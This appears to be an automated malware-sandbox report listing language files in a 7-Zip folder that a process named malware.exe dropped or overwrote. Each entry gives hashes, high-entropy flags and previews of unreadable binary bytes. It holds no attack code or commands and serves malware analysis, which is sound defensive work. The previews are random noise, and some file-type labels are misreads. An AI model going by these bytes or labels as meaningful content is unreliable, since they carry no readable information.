                        Preview:...G..^.y.....m.*p...u....zB.*..VK/s....Z....AJ..]..,C.9ms ...... 2e..6...l..n...#.5..p^..RP8/!J....D><.di....5.Ja`.IV..hb.X..9J.^qcEQ....|.c0.\w.z...!.&...&R..O.H.K....Px.{p.#.L..Rgd.C..cr{....j.25..V._..Y<B..m...........:..CJ.q.>..?f.@Q..[O....c....d.A....Vh.5T..`Nh7.t.@f9.q.O3.o,{`....[;..`m6_..._O.~.g.h..s.[... .E.t..H...US.h. ..?.V.3BT....5.-._8..$.3..-)......D..8...n0.o.S.Q.... ..G8........X.3.nTp...6"kr.v..xQ.0.4m.t...l>........He;xQ..Lm.......b.....I.. ...j...Ym.?....Jt..F.9K.....7k4A....?.?.@.h.*0R.9^...X..gQ"^...#_.F.f..+....U.2.....,.c.`..!...>..... ....d......f.y..1..X.........a.ynV.....T...!......6y!Xw.u.....n".1...?.........../. x..HIo;.@A....3..g7..96m.._H#....wz..-..B.W.@J.I.T].ed..V<...%./.n.....~;1G....1bPS.40....]...d.../........ .*JNX~..F..!..xp.T.r..eN..=..A..i1.s.n......%9..~...q7u..(.T...>Q..g.S..+....N.3....e.lR.HX..mzv......w.r/-......I<....l{b...a&$.3.l.>...1p.....(b.(..eP..tr....&3..I.]..U..<....m.A..o..{

                        C:\Program Files\7-Zip\Lang\ar.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):12902
                        Entropy (8bit):7.98642701310209
                        Encrypted:false
                        SSDEEP:384:uvFz65tJ+BLjghL4IRJXlVG2y+d1LSzq9DLk:KzctoLi4IZVVd1mz4k
                        MD5:B16F569845D505F5E8F9A10E92F43E4F
                        SHA1:7718050BD3292F463B2A29E5A2652EFA5ED556A8
                        SHA-256:908C4E55DADAFA3FDF0EC7E0543B798B80B3CCF5BB1BFBBC9B43DFBF2DF3F9C3
                        SHA-512:531D754DCED30B7D74901143C1EBAADD9DAE46CDDF3E9F6E621D9559A6E670FB66AB98FFFC968EC25135AECF794E3C1C9D9DEDE148CB961705C059945FB24E54
                        Malicious:false
                        Preview:..w.a..b...S...&>u...5...X.l...d.01W....[.N.7.(........>H|..g...B..~......;......h.~..K.1.2....{..I.d..n..I.Lt...'....[$.D.'.B..5..A......\._Nt>..VG..{.*..U.....J..H3/.Bds..T..ks.7S....'.dJH...<.j.d.)..Z..l...v.k...Y.{e.sEd....{.,......,`..P...a.-./..'[.m.....o...p..~..m.....I.r...u....o.b.....n.d...Vq]9&..S.....*...G.AZ/Gz.N...;s.?..G.k.'..0.n6.b....X...$@n.\..a#......".@.M..!$j5...w.-......zf....q-..5q..C..X>.{;=|...Le2....B(B.{...&.......4.U..;.a...2_b(..5........E....A#Q.{..DhRB.!Gt?r.!..!4..~...6....L*3...zRZn#..P..&.......1..0./...F......l%>...P`.#E!4.i.>r.>7...}F..!.B.Z..i.......X..4....tHz.!...D<....f8N....3.Z..,.R...1fk..:.j..'{$.GVU..D.$......G......X.Y.....Or..K...5T.(.?.nb):Z.7...Y.K...b.14.A.^..WU8..vP...//kq.E....../3.B.=,'y.....j..>.;.&......!p8.+;r........\$...hK.:...+)k/"..pD>.d......}..5...~.tn..tZ....*.....O:e% .......q.v..k.Q..1a@v."@!7.7U....0...N.....M8....$..tj.o0..=.;..'...s..-.e..`...)u.X..o.>>.Yl..F..a..GM.v...E.+.$...

                        C:\Program Files\7-Zip\Lang\ba.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:OpenPGP Public Key
                        Category:dropped
                        Size (bytes):11349
                        Entropy (8bit):7.9835692667589715
                        Encrypted:false
                        SSDEEP:192:dWHi/Y4opLjALSw1E3iC3qRFaaIEkEj2ythES80PeILyI1iI9+9Vx:/g4opLjmcJqdT00TyTx
                        MD5:C40051C8E005E4558CE806C343287ECE
                        SHA1:08BA2C8FCF0366942815790836FE9A020E75DCC0
                        SHA-256:26C4C65770185D4A2A726450010F5B6BF009CC920A16AAC97D86E415F15058EA
                        SHA-512:381B99EDF802833A592CE5678F4916C39EA82267A739B0FDCA9857EDE07A509CC98DFF31550AD96828AFA505CBB7E9E4133C4F514ADD2F208F2973B4DFF5C89A
                        Malicious:false
                        Preview:.\".;....."3.D..=..}..eO.@..{...dVL...b'./u.z.L.5l=..e....k.G=...e.Rh/r.....z...._6..[.sn[oB..S.(>C..HKe..cd.IY.......Y...O._b.......+.!b-..G.....H.IIi..<.Z.p....Y.6..).../...\..y....f0.V^..;..B..W.M rw.....R2K@..%...t..J...a..E]#...X.....t......A.&.$.R.m.......C..DO6C.a.Pr\..F.....y.d-..L"..%...U.....9\.E....n....5.P.d...Ni..0..l.L....bZ.J...[.....s.....[DA=.r....nQ.UY.o...{1......Y..D..O;\.....L../.p...hR.nO..(.]...K..[...o..^.*.......l!.U...@L.G".jthU...N..:..7.....B.t...e..{i..,:{z..Y.kl.3%d..dm5..LM9..j6v.0w...Je.....G!...z.M.,xY...Ls..=..A...6Y..:|...."^ nh......_$NT..g.f@.ZVA...T<(.'.b+5}..%.)...:.*.b.Q....mw,...l.|...C.u.^i.;.U>y....je.59......W.q.^*.@".%0.<.laR7z.N....$....D...*=d...~.3....(Oz...ZI........b....{....o...r....N8..U.."..-../QV.d.7..,%.)....G)..r.p./..cse.`....[z.....J.....rRia.~... ..W..P......?m.2:..'......Gx._...........*...A.B......7..8..,K6..o(....`.T..../pS..K}.'..-...X.].7.3...W...xD...,..'L.o3.F\.Y:7..w*...... ..

                        C:\Program Files\7-Zip\Lang\be.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):11969
                        Entropy (8bit):7.9837464402631335
                        Encrypted:false
                        SSDEEP:192:gcJPuJ5SuJJAU/IuHewxKVkwwpRGgkEPf9JA9E9SGKCDfuNvjZWWP:gnJ8YAQfFqwF9J99pK0fuVjZhP
                        MD5:C93BEDECEF32145A44043320B6CBE8D0
                        SHA1:8F7D4ECD6F934816A0C30AE931ACBCD4D0E09D15
                        SHA-256:D0014ABADE97CF0B5362371146583D6315D6BA8C3D8D943AEF4B362C8C0DE662
                        SHA-512:B7E48E21CB80D773A3DA538B1E5FDDA37714DD65FB80C7C142DC69D1933BBE45611C787025DC9BCF766C7B7694B1DC48E5F0912B23A399D36F0FEB4CA07FB42C
                        Malicious:false
                        Preview:.`.....\y...._.$..U.../..E>..T<G...;p.>.......S.....+8.......M.pdY.G.Z 7A#zy.X..h...V......F....G......ET.,.3...p....5.Kq...V....k.].5...).....'q..I.*.]<..%w.:.:..7/.>>a...:...>Z.....0X.......'..KM.{.W...o..=$......D....@.6.gU.......9.m.*.t~..Z..X.......J.0..:..&...>GX[}}....R.HM._......8.i.D\`.....0..2...H..X.;.".c..W..:.,.M.0.L.Ms.h.....7....,..m..%.lG(.u.....A&.*&..hg6..m...8.L .(?..}z...60P...MN..".W"...}o[....o.t.D...W.).,+...EH.....,....O.?/vrB~YFeX..&f..z.).y...A....@...k..t.t.]#..3.=...Q...]..\..5.....a...E..e...C....v..K[k.p.%vp.&..e.<]...GM*]+....ui}f..4..ZU.B..:....;=.Y._.LH.I.....H.E{s.o!Ox.).a...u.....k..l\....<C..%9(J.6.....B....D.X{M.f.`.cx'...z.p&.<3......t...A*.nl.Z...lO.!@&8.........D`..........A..}....%..T.s.....W.:..mQ.4r..5.g;`W.~....6.....8.nt9=...e'}..V..b!..}.9..'...+v....thX.0.......n$.'.+D..:..V.2..~....~.......?.....re....d.'....m.K....OC...l.W(2-........M...\......$..?.`......fA...S..DQo:E.....B.P.......B..D..

                        C:\Program Files\7-Zip\Lang\bg.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):13204
                        Entropy (8bit):7.983815857400204
                        Encrypted:false
                        SSDEEP:192:NXLLLkSjq2ZgxJC2bZ7ECbdqAD0vRb9ll5rYpOIKWEm8B/G9FmJm9SDMYyB4:5Lljq3C2NFZqBJb7l5AZK/G9JCMYyB4
                        MD5:93EAF5B0299F4B872CA564FF64B25BE7
                        SHA1:E64DF27CFE53AB6D3592F2B2A4607AAECF070515
                        SHA-256:F179E2AAFEC43EADA7CC1BC94416155AA7B973ABC722DED9B72060219ADF36E7
                        SHA-512:E655CB0F9173F6614407D2D5F477A2DA2DBF19304BFA5D1CCBBDC5376DB9E4396DA89766DAEAB9D4351882EE0C5DA4E724A78F2518671DD69B84F14908EAA0CA
                        Malicious:false
                        Preview:N.y4.!..E.g..oU..z6.....T...Q<.......>.....pG.....@7...5....Q5...-.a.....<g....1..,....."..w.Q..g~..?oFH1.vr..Fk.>.S.....E..;|......t.,!.jF........?..f.....s.....B4....v...q.J..dJ...DP....t.pJ:/.Sv.i'<..VJQ.3......e-..#..&.D.rx......F..qE.-.[%>=B........tpq."NW>q..m.E..q|..`j&..d..i...Z]...O.H...P5.c.....d....%.....`....]...;....6q#.6....1.AuO(^Sg.._...OQWz=.`...d......q.0h.].,...iWL...XL.45.|...B.p...........f...$*.'.A@{..g.D........gO;..'..Fht....#..:.'?9s....^...-I.CX.(.#........g..<@.y..\...Pp.A.....v...jR......`.4...RqS3.[......Uj...P......'$....4I./.;.U...."'...,.>E.t...{j..w#...*.{nc......>e......#EB..)*.....%{.H.......~...<m-...1.k...\.[.,..UI`..X.?:xj...6.......q...,P..I=......}.;..cFk.pH.e...et.+1..6.......'....5.......h...4..........oO.OO...h,.._`........2...|.2x._..6...cH..Rc..K...<.Kz.W.j ...O.M...p.UQ?...x...]...m. ..$.u....E^.""V>7...;...jrX.'...vo#...~&.^..|#..@[\y5O.....b#..o..4...W.9.b0..w..j.M....9/..R.l...g

                        C:\Program Files\7-Zip\Lang\bn.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):15145
                        Entropy (8bit):7.988761404330969
                        Encrypted:false
                        SSDEEP:192:F61zDfoEwsJlNdyYuQDjxX9Wn4fKQrjsVpE7ykgS55MSrz6z2XNx5vNkGlDPbQD:FsboGmwD1Xs4fKiCRhSwWz6iXNhFBPg
                        MD5:454203F1ADCA1A1BC40DC9E267BF5698
                        SHA1:699A6BF786CDAC1B354FFCEF38DDCB0EC372B46E
                        SHA-256:DBC9B5FC1A5DDE3C22818B356AD4CF3B4112F0DC46DEB15BD339CBF74C85435E
                        SHA-512:FA5288CF13AC97A2A1D830E5635DAE87E1FE7F66AAD2D4A8DA7E9FAFC71F8DDC166D98E0AF62BEF97584AB94D793A76708357B2FD76480F3D933FA59CED90BF2
                        Malicious:false
                        Preview:9...a.......Re.....5..f.Z.|.r...{.T7......e....Z.Nk.~...)k....(.....-..^....S).^.....>.m7B.hFO.sz....D%..g7..k.L..Gl...H...fCna.w.....i...+.O..M.._..:&j>^c..M.L........V....Z...WK.1....E..qX.'!.!..2..:>........,..2...$|.+.F.2...+....5..0...r... .-..R.)..a..A.\iN.&..tS`...Jv.n...z...$.g..h.",s.Yp.0...h;-\:d.Z..cQ.8!.........?zZ3....-..A.O^z../..p.9.D...h...-.o~v.N.$.;..F.m......7...f.1.H..$8"....L...V.X.?......<.7<.u..Z..[../.[/N.9#4.S.l..1....@1g......,T.oa.....@..o.....|o.G.h.8/.....l..I[..<.....he..."..."c...a...&..FC..CiN.....|.~q...d>.m...<.....E....w._........E>...H.nn........^....;...n....).[...K..l...-.....-v.a&.m.....Z....+2..H..^n.. ]~4.q.C..FK..l6...t^.E.-2Y(#...e4....~._.......w&._.*;B.....w..=D.. V9].S.R.6..X7Sh.}:t@-....R..l;nZ.N...Q.(.-"..x`...lw.]h4.y..kS._#.=D&..8.s.nT .L.E.U<..@. .Q..................P+Kg..;A*.L.'{.Q3v.V.m.3!.N.%A.....(C...\.).G..'F.......~.fj\.P>.r+..!~h..(?..H>.=...wM.W.G.Cl....M8.7.h.............

                        C:\Program Files\7-Zip\Lang\co.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):11060
                        Entropy (8bit):7.985247965454584
                        Encrypted:false
                        SSDEEP:192:FrTPVYIh2CUtRsrOY0/WvGwSOqdKF3sQWTJk430C14rnyQ264RK5VA:FPVYhRgrOv7wJAKurJhk04ryQX4h
                        MD5:D211B5F820F1215CAF74FA764539667D
                        SHA1:87A5A91C7076BC08E8C1E46A51AA3C24E2B6A44D
                        SHA-256:11EC9084F0F957720A7EFD2D3EAE60939A9F3BF1F048DB7176BAB609611D8909
                        SHA-512:486E7C0D5D083DBF1C412D00A4AD5F4973FC900A0861BF61EFA1460DCD76FF88A573580EAB73EB9CF5C4D2AD0EDB9904C594F926320666F23190E1F1BB1D2802
                        Malicious:false
                        Preview:...`..o...I.('8..3...M...t.j{!...LQ?..=...#......,..'.m..6..D.6s.^...~T.%#O.....,...n...z..-j..h.d.....UN!~..C.....L=J.mQ....2?.B.a.ah....3mB..%.~...j...6.X...5.......b^..X.O.1..D5\^.s..X38.[..d...i..E.z._.4V.m...e._.8=..?`].,..qo.......M....%..DM].%./...P3a..S7..U!.<-......!...........T.).K.>5$.0.Y....n6......4.}...!.....{J.*-.+2.d*9.c....+~..e&Z.^...Pl....J.<.M.[>....o..n.3..%...2...5..uT....l....,.X..1.43...GR..2...%....h.W."0.5.V...f..P.U+.#.....w...Hr.%........)v)........G....d...M)..~..c...T?V.y...q..(YEZ....bX.%e.4Q.tn..rV....E...&6.k2..PR.<..f..i?ZS..- 2 ..-........X.7HH;i3-@..8ub2../..".r..8. ..4.......}....G...T?k"...|.3J.b...n.......ja..%..[..Iw...Z......MC....%wd|.A...3C.0V..!.i...O.>...?K.vH>..!...v.4...5.<y..F.F.......p7mz..5J....&.D..... ....^...-.........)<.YAWG.w!....Pl..Tp.....y.."...V.7.....M...w....r.._.i..R..K/.,.%...c.E.U...Y..[f...f..G.2.nt......'C..'RA.^....=.No....f{u.7..&...s.0F..9l.6.t...6.f......{]#X..[.?"J!...

                        C:\Program Files\7-Zip\Lang\el.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):17005
                        Entropy (8bit):7.989120453473558
                        Encrypted:false
                        SSDEEP:384:+cz4xxn7cNLgMhjc7ESTiCt25zu5twKmfGmqDfllozVJM5:+H3n7cdgMmlik21u3w5fv6dlEVy
                        MD5:1B63CADFEA1CA21E2C39F9B7D215813D
                        SHA1:E3513E8DE9B9E01177A7CCED1D507B471CCB7D89
                        SHA-256:5C05C35FC46507ED9247D01EB6F0A78316004F0DCDE37776C52CD190ACD1E988
                        SHA-512:19763829B78D775BB21AC86E8AB30F6A473E4294B3621E49F28732A632CA4F11C887CC40367E3337CD242152403E6F1C955805BD998469D5D91EE5959D157F60
                        Malicious:false
                        Preview:W.zA=%.Y=.d.&..w.w?......6..}.aoqI...A>..>.1./..D.O*vZ..R^..k6uAx...7cv....c...5.2.8'....w.M.|3qL(B....a.B..j.a..1..'D.^JR.m..M....9.&.~.o.....eY>..K['...7....8..d...S..r.......M$....1.~.....j.3..=...o$.Fzu..Y99I...R;<o}.D..l.....l............V.e.?Ly....?.....V..eS#=....v.9U.......<...6.^....Q.......*.p.k.Q....+.5%>h_Q...`.}4.5..qd..o.3Z....... ..^.V.}....j7...`....E..V/nx.........S6.Z../;@..&..&..f.d..5.....:."...y.....\c........,..u".....Q....}f;...?.5O...r...Z..N_..j..Q..15....v.U....J....r...r."*N.qL...wHF.`..... ..8.jt..$.Y2...k...o|.`j..M.........^@-...(........u.C...r *N. .EV.Qyq.w...B.5.h.CO..?...>w......V..7.]#._...MnT|.Y.3.... T...<.K.[..y...P......vk.@{y.4.._^EJ....?.U...VT..J.0..u;l..L.0.paPkhCLw..1...A..._.C..M..CA..x'4".T....E0...&..n.p+.C..d.6d...z>..8!...,.6.=J.x._...K......5.{:..VI......p...!9o.7..<....Y...E.s.@....wP`.}....w...PY~Dt..e.z..?"yj.Q........~j..<.{...].N.5./.PG.Hw..O....5JN........y`..9%..@......5.R'..../R.

                        C:\Program Files\7-Zip\Lang\es.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):10147
                        Entropy (8bit):7.982525752883543
                        Encrypted:false
                        SSDEEP:192:tqtJxXH+RxjDsPiM++EEQMJ/kZvPrvM4a1hSn0Kt3/c:IVkDsPiM+8QxPraX43/c
                        MD5:66FC8EFBFCE102AD603A02F3E1B99F57
                        SHA1:49058508D02791DD188EE2164033A3DC93B290CC
                        SHA-256:1517D08D66BD765062C92176A01E8DA5A14756FFDE29807CCB436D0D12D5FE19
                        SHA-512:C367128B59FC9757D0B0F69CDFF5C3E6CF63335242B599712B39DF62D73B660C7178EBB35936CFAAE33BDA7BF84FC410D1AB83C8A20ECE831EC120953D4B32D5
                        Malicious:false
                        Preview:..X.d.h.h;Q4...!.y.....<....k... ..q1..t..|.0/>.......W.9Y....C....u...4e.....g.).D.P..kDB4[.D.G.<x.~.W.z.....2dG`.ua....... q..5....y.i..|+.....g.r......x...8. ..d..+.....N...........O4...O.D...M....W.H'..@.GA).5.....`?;rL.#5.X...^......]........r..|.D[....n..hV..p....?.hns...=<.9..D....BG...~y.#..a.$.....>9...hRIRR...:...za.sb..<.nY..+RbeP.].Ng...z..$.pX0.\Nt...0..E7fv-......n).0."...>.68v.W..p..Q~z..D.=oF.,..N ..%...1.X.1~.).%.....v.=ah..A.J..e.....#.....(F..)r\}.+.>G/..n...........L%.N}j.8.v..i... 9.y.....:'MT1..m....I.mV.......F$zV0.. S.,c.L|jF....U.3o..V..L....].xP..R<.+.)Q..yE~U.........mK.1...(./.]$...[..b..+.<.;.`bDx6...w)a.....@..HN....=Y....#..;^.,.`.)....A..>.'{....;......RN..t.9.[...C....*.`C.&..1.t.E.x)G...Vx!z3|......_.U}.!Mr...y.....6.?.Q#..i.|c=.r..K..;........Z0...pWm...v3..w..Vv..."H.......4.....G...AQ.O8....y..-...+....=.Y.......T9p.. ....*.@)........J......p.a..6r\..`..N...+C..`.}f..4.p.......Rv..&{IV.l...c&p+...........+.....f

                        C:\Program Files\7-Zip\Lang\fa.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):13904
                        Entropy (8bit):7.9837665808414755
                        Encrypted:false
                        SSDEEP:384:logESxdwCiVK5NUg0HDEtjrmXPKitJ2yB7v98lMebRBkbv:lHEwmCiVmEDXiitJ2OSyebbkD
                        MD5:5B2D97A599D67015FEE49DF0E69ED866
                        SHA1:0C353AC78AEBF71EA3C76D5F8FDC00FEED60AB3B
                        SHA-256:975065614A36FDD1ABC60320038D82E4793C4D618161AA9191DA1D93F610826E
                        SHA-512:8BB7359BBDC64D4C48ADBDC159DE7FE2ED1C5870816E33155202C5B89D29477B6B14540F69ACC54FF766156F5521EB3DB3C16A027F2DD147A681BFD52C6BC48F
                        Malicious:false
                        Preview:K.....N.C.5(.J.?.....N.....m|.T...=...<#t..Ko.hI......<.s......P......$.W...C..&8#.w c...\}q.e8.7N.0.....K...J.N%..|N$.3...7oj...<;X.4\..O.<....C....2.g~nw.t.$%.-ce.Y......^.o...gA.v.%,...o.`;%.._..w.....o.V.EC.T.H/..='..O.`8+..ci.s..`../^s.S..#%Qc.9.~.o-.....|.e.G..5....M.b.?U...t.q..*..:..X...V....QJ.S..@..eh.!....T.....b.T...*.1v.....W3..cB.Ik....Er..l[m'..I......'m.._.....p.....pM(mw........k..4"..P%.5"......E....J.q.....o.j....Bf..M..!.aY.W...9.g..H..;..!y@\..&..},!..,.M..W"f.A.8`p..]...BzX#y..*....e..)~.v3h...^.... .2.z..5..~.R...C..k....l.3.^..q.......DH..(....lM.Q......)...'.....Kf..s[E.E..A.).......W.r.....Hw;.|#fk..3X...F..&..I.u.W..`.5.:.d.@......]@L...>...@RC_.*.luq.`.Q........=G........ ....c....X3..X...K..m.Yn[c.../....J^wit.V|k..?.z.E:L-.9.sgI..@..X.XY.....>.)G^nUf......h[H...$...5S&....H.H..p.eb.0...Hy#x....T..._..`y..g.<"f8....m........v.a......m.@`.Z..../.E...s..>....1x...c..^&.^...=...k.,w*.i....@k.....-.2.n.r.z.p....wx...`.t

                        C:\Program Files\7-Zip\Lang\gu.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):17877
                        Entropy (8bit):7.991754824352126
                        Encrypted:true
                        SSDEEP:384:ebQPJtQzYAGlkeWiZseo+4PV82nOZgZitWpnuVkA4I:RJtQzsklNDhWntWC3
                        MD5:F6EA476F8D0B942FECEE0123EB0F4751
                        SHA1:6FE6168FCE9DB4419300FADB4D4D63E56BB0B58C
                        SHA-256:B8E4EFAA9170FFBDC2CDDD1BD9B95B4675F61F082EF202D10C781531EE6D5842
                        SHA-512:A58C409298A384843FC8461C60C1B53D783F8C8F1B41864A9CD456346ACF03318ADFC27374F15AC9855F2D669FB3AD92D19CAD4D93BEE65D0954EF40E0D9E993
                        Malicious:true
                        Preview:r." /..%.O_.........g\..-.A9....<...KU.3....oE2..MY..+%.u.)..~..}..Xj..@.]Q{b.v..#C..E...~.....i....m.<..g..E...(..h..".+&c.:...UV..,.6..e...9$.F...r.....D.s.R.....|;..})'..g...$...j..]....k+.@...E&&.PL.h5.g.OB;......L..q.XI...o.pC?.W......T.p..X.U..Nx....~.x..J-..u.==..C....0..U.k...9.&\..G.."..#.R.n.6.>.;...y.../iz.\;.s.i^Z..!....TvP<"N.v...il"..... .@...C.7.....X}z........Gcf...N....?.[:%g.......,O.gXt.p.J#......3P..\1..1.....Lh.'T.i[ )ubSbVX.........e.xV..U...j.qi.C...o6...|...../.-.&...2).[2.BI{...B4.v......6\.....yAM.M.....l..zZj.W..f(.O8..+. .}!...b..H......f.b.j..om...s....o...w.@.4.|wg...c..dy2.oy.G.]........Ia ......K5...n~.Z.a? .......e....;...e%...B..%j...FwKp.*;.B_...KG..x@l..xl`....O...!m...zE....4'$..$n.....i..q...x.i@..zV.A....~...i..O..b.=.D.}x....,]..U%..q.Z..B&.@..W.?..$p...c0.Rw......_+U".......,....2p5..M..wm&....v..%.A..\c3..FN.."..N.....Y..l...7.X ....R*z.......n|L~..WU..~..e..C<.W<..2.#[..9..B.......|..2(..L'...J

                        C:\Program Files\7-Zip\Lang\he.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):11512
                        Entropy (8bit):7.98201924070272
                        Encrypted:false
                        SSDEEP:192:SXk4raaj8Ce99C0QDr07MngGYimdXLtPX7XsYqp5i3VO6p+3YSIHsj3qLbz/Wt8m:F4uao99ws7ygGYiYXR/LptcIvAOpGeQ
                        MD5:A7619D7FC624641FFF71EA8E43B18BFA
                        SHA1:A9F2C5C524D2C3119327E2FF7671A79BA9DA86B8
                        SHA-256:B4F3AC67192E5CFF799769CDD4F81C07227A2AB4A8036B98E72567E71245F944
                        SHA-512:87B04F1E9F314357CD29F854435B4570F5734DCCD4D5E6448F130277616E74B6B76963A4D3C15626F5BD0EEC3CA9FF0FDFB321A0EF92C452A122C4875B2B9A37
                        Malicious:false
                        Preview:&.....M....x.....n......Dv..~.W.C>..:..e...X3.3T....wYp.....u....P./....9J$........`..h...*..O.L.$.d`..XE|0.Q]\..r..E.G....n.q..}....7-..d....%ca..Wq.?l.We.......s`...$.C..;..s...S..'W.O.zw..u....8...8...h.V...&...Z.+...s....+.y>.....j..N...&..N..Z9.l...t....- ...A>;....-`:..<..h...7B.....yi._8@k..h...Jk...@d...6.4..P.....SEU.#u...^..E..z..GX...J.Mj..[k(a9\......k4g............y..@..._....-./.5;.JP...N..0|....?...=v4.y@S.Z\..|...$..`T.$.d..........P....qV.A.6.`.[.y..g..'.}.q..[.....&......?g^A..2........wD.........E<.IP.9...Z...%............f...H..k..i...V.lFQv..%...B.|M.P...fF .sN.Y?.N>..x$......p.}B....3D...*.....=.|(..{....\...Y...pM....1..h..L...K.%-..mf..1O<...o..;].>..........]U....[....,..<S.+H...e....z3q........... .fo......99..}......>..`..1.W.y..o.....4..g....k..........X..0.AP.Bio.\.Y ..e...E..r.6 .....ub5........:(q.}..M..9..g....5B..,.%.6..7...]?l2..r.....x.,r.~....b...zV...!X...A...d..ue.q.E...~..QC..:..W...X.W...Dk..<3-

                        C:\Program Files\7-Zip\Lang\hi.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):17979
                        Entropy (8bit):7.989030723519722
                        Encrypted:false
                        SSDEEP:384:OAiUItZeY4MzsmRU198foYnLCDZZDSyQPHPXZXA4KQl:FivtLpznVznLyDrQPHPXitQl
                        MD5:068992EC25B4E90BC01EBA926DB3673F
                        SHA1:8FFD305D322D07E15C1C70F6657C7CF2C75FD2CD
                        SHA-256:764C92F50C66F41A9F442EFE36452AF79EA23440C37EFB50E08076718CCD54CF
                        SHA-512:B01F99CB1BF3F40D30ED71B2BAC391AA60843FDFB1DA86A978AD2CCF39A8C61AF08E0FE592DB64CB6E5E8DDACA39B2C09CCB9E125BA5B1468FAC8E505B394675
                        Malicious:false
                        Preview:..g...#e........qW.......i..a..^...P..N~.$e`.%../P.Qd...k.!.I5st....%..i..V.M.D~..s...@6..H..dK...~.....s%=..;n..^...0`.m.'W2]l=y...<.'..IC.+N..Q6..K.M.......O......,.MOt"^...5f+ O.j..M.n....].!K...8Wb^.....d.n....sN!D...q...-./.y..)[5.k-2?.z.1..m..|..7.*.d....-.#.I.+.(.D..%D..RT......7Q.'..5...&t\(}.7..xtL..\x.p...=_9*s....`..$..<i=...x.V.<..(.#\.-Q.Y.>...9K."R.. .".V.3!h.[.{7.=.{[.........v.......U...T.h.T..'%-.`......7..!.Mvs.Y[,..n..1k:...L....G......4.......?xI.%...U....hKm"...]E...f..........O..'.RI8L,s..<.X&.....VI.UmZK*Y"..pc..\I...sj........A. .....HR.c1..3.A..Ic!).V..(.hs........}..1:..}.8?.jo.uI.\...dXW.5.:..Q..0N..g.X..!.....7.0.k..w...q.5.$...A.H..\..R.!#SV.V..p.f...<B.....*.......R..... <]E....Y.\$0...n.2.C.'...!.CCv..&.y.........3I..p^...H.Q\.q.....'.+);q...X.Qv:q.8...wW....6..=|C....}|..,a......3.."..K.d...F;D.....P..A.g.Ff...>.<.`.7.....N^...O...... ._..{k ...;....-....k..0.-c.6R].^.LL.z..R9....qx(@........."..z.V...z....." .

                        C:\Program Files\7-Zip\Lang\hu.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:OpenPGP Secret Key
                        Category:dropped
                        Size (bytes):10285
                        Entropy (8bit):7.982897237719156
                        Encrypted:false
                        SSDEEP:192:6M6J7ZLqs8lQMV6V56R/ybubclaTh3NkYMbjWd7rtFH3XnXE:6nU3iMV6awaTFNvMb6fFXXnXE
                        MD5:B0782ACE1527E785C4A60B0EA01A5E90
                        SHA1:0D4B9AFDD4184DC56F92BC229C025675009C2485
                        SHA-256:7D9A64FC78202C3FF146AAF8E9751C00C8B07E975D3A6F2220FD3C6202339848
                        SHA-512:D317126C5D0EEBDF35E09EA9089A6C0A32D1D09E81C23ABE148DB51F4D88F87E69D08C331382BB06105703A888983410760ED6F5A4C5A4542B6E8D1026A620BF
                        Malicious:false
                        Preview:......D.G..5.7..<..4....+..=.q...O8........F.9.../....3~...1.Y,n=...`........g..D%{.j.....}y..+...H/...P.B.=..(.B0......>....a.~.k>|....... .93...)ia..C.0.`SS......>..............6...%{Ap.|'..h..kL.,`-B.r...mj....u.{..HZ.....5.~^8.......LGQuz..p.{.F......5....J.zt..7.@..H....3..)....S.y.3.....|..|../.qeN'.......~.......9uH.1..=|..Q..o")<u.5,..6..[[..j..F.......jX.........Fdi.Mz.......m.5."..2h*m.!I?....].....U.?..3..!...}.....Y...D...UHF....".f.....;.;B.y..N...$......Z....6.R...N.[$.9.....4nf. ...] ...<.}..>..x.l..........g..1u...c"..*.g..bj..fmk.....+...p.u.V.E."..!..=....Q.p(..(.g}@.oL....Xv..}u.2M....P....C....rZ.F....Gw..Mg....?.TWf,?...t.[m.._.hb.":......+g#.@.q.....&.Q.......`.f..z.M..(.i..F.........xv..4...k.k6.3'....i_B.M.U.#.... .9...lRY]...:)c."..N~ig.9...%..G..1./Q.\h..B.S..[.;G..k(.B..u..<]>^.wd.}......+..&...C?zt....F..t.B#Hn.N?.d3xg)!..v.TF.T...(Up.B.{._+]n.x`.EM..G+*.xj.(.U....[..dV.V^.2.....H.8.s.0..b.|0Xn......+...3_".+...}.

                        C:\Program Files\7-Zip\Lang\hy.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):14245
                        Entropy (8bit):7.985425339572157
                        Encrypted:false
                        SSDEEP:192:Q8RcaLOJRY1brMujOgckTC5GybOFbYeYGZOVEcDvW1Zz7S8f8qmBUiAjSBZL:1qaLOJKGujrckSGXy2ZgDeLFxteL
                        MD5:C9E423B7C48FB0328702FD51F3936479
                        SHA1:DC48F272A8F5201E2C3692D4D326918472CA4979
                        SHA-256:FD7A7BB078C07AD3006C07F3829974DD8BF753B802672840AB1A5C66D124C074
                        SHA-512:8E167709C5F80FEBCB83C59A11A8D220AFABD1FA77764EE1C4DDD533F86A07F05DEC26D7CAAD2311D444929D778F0F67A5E20504F97B06E8C5FF969B0AD5FBBC
                        Malicious:false
